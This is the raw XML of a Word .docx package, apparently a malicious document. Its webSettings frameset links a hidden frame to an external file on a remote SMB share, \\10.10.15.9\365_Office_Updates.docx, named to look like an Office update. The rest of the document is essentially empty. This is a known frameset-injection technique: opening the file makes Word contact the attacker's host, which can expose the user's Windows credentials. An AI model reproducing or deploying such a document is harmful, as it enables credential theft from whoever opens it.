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DCC81" w14:textId="77777777" w:rsidR="008F51EB" w:rsidRDefault="008F51EB">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008F5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45"/>
    <w:rsid w:val="00830145"/>
    <w:rsid w:val="008F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638C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A7437BA5-0ACC-413C-894D-9A763826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rameset>
    <w:framesetSplitbar>
      <w:w w:val="60"/>
      <w:color w:val="auto"/>
      <w:noBorder/>
    </w:framesetSplitbar>
    <w:frameset>
      <w:frame>
        <w:name w:val="3"/>
        <w:sourceFileName r:id="rId1"/>
        <w:linkedToFile/>
      </w:frame>
    </w:frameset>
  </w:frameset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webSettings.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.10.15.9\365_Office_Updates.docx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Wilkin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jacob Wilkin</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-25T01:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-25T01:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>